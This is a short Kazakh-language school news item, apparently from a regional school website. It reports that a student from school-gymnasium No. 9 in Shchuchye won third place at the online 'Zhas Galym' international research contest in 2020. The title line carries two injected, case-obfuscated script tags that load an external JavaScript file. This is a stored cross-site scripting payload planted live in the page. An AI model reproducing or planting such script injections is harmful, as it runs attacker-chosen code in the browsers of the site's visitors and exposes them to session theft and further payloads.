«Жас ғалым» VІ Халықаралық ғылыми байқау туралы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

15.06.2020

2020 жылдың  30 мамыр күні онлайн режимінде «Жас ғалым» VІ  Халықаралық ғылыми байқауы өткізілді.

          Байқаудың мақсаты – Қазақстанның зияткерлік элитасын қалыптастыру, талантты оқушыларды іріктеу және қолдау, оқушылардың үздік жетістіктерін көрсету және насихаттау болып табылады.

          Ақмола облысының намысын Бурабай ауданы, Щучье қаласы №9 мектеп-гимназиясының  11 сынып оқушысы Бекболатова Марзия қорғады.

          Зерттеу жұмыстарын қорғау бес секция бойынша орыс және ағылшын тілдерінде жүзеге асырырылды. «ХХІ ғасырдағы тіл, мәдениет және құқық: таным сатылары» секциясында Бекболатова Марзия осы конкурста өзін лайықты көрсетіп, ІІІ орынға ие болды. «Адам болмысын Абайша таны!» атты тақырыпта жобасын қорғады.

Құттықтаймыз,  келешекте үлкен белестерден көрінуіне тілектеспіз!

 

Просмотров: 463


Пікір қосу



Деректерді қолтаңбаға қосу